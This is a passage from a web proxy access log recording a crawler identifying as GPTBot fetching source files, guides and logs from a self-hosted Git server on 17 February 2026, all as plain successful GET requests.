"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" -[17/Feb/2026:15:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10885] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" -[17/Feb/2026:15:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" -[17/Feb/2026:15:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" -[17/Feb/2026:15:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13891] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" -[17/Feb/2026:15:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14672] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" -[17/Feb/2026:15:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13890] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" -[17/Feb/2026:15:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" -[17/Feb/2026:15:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" -[17/Feb/2026:15:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" -[17/Feb/2026:15:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13941] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" -[17/Feb/2026:15:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14213] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" -[17/Feb/2026:15:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" -[17/Feb/2026:15:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" -[17/Feb/2026:15:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" -[17/Feb/2026:15:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14639] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" -[17/Feb/2026:15:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10885] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" -[17/Feb/2026:15:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16485] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" -[17/Feb/2026:15:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13861] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx" -[17/Feb/2026:15:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" -[17/Feb/2026:15:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13941] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" -[17/Feb/2026:15:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14827] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" -[17/Feb/2026:15:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" -[17/Feb/2026:15:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" -[17/Feb/2026:15:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13943] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" -[17/Feb/2026:15:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13890] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" -[17/Feb/2026:15:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" -[17/Feb/2026:15:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" -[17/Feb/2026:15:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13891] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" -[17/Feb/2026:15:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" -[17/Feb/2026:15:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16486] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" -[17/Feb/2026:15:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14214] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" -[17/Feb/2026:15:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" -[17/Feb/2026:15:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16455] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" -[17/Feb/2026:15:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15903] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" -[17/Feb/2026:15:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md?display=source" [Client 74.7.227.38] [Length 22115] [Gzip 6.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" -[17/Feb/2026:15:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good?display=source" [Client 74.7.227.38] [Length 16215] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" -[17/Feb/2026:15:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md?display=source" [Client 74.7.227.38] [Length 11758] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" -[17/Feb/2026:15:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11321] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" -[17/Feb/2026:15:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 16997] [Gzip 11.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:15:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 17128] [Gzip 10.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:15:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 26685] [Gzip 16.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:15:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 28042] [Gzip 16.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:15:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 25058] [Gzip 15.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:15:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 159403] [Gzip 20.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:15:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:15:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:15:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 11076] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:15:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=mostcomplete&state=open" [Client 74.7.227.38] [Length 8509] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" -[17/Feb/2026:15:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=leastcomplete&state=open" [Client 74.7.227.38] [Length 8504] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" -[17/Feb/2026:15:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16579] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" -[17/Feb/2026:15:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16209] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" -[17/Feb/2026:15:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:15:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 102161] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:15:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fOld_GoldMonitor.py" [Client 74.7.227.38] [Length 28365] 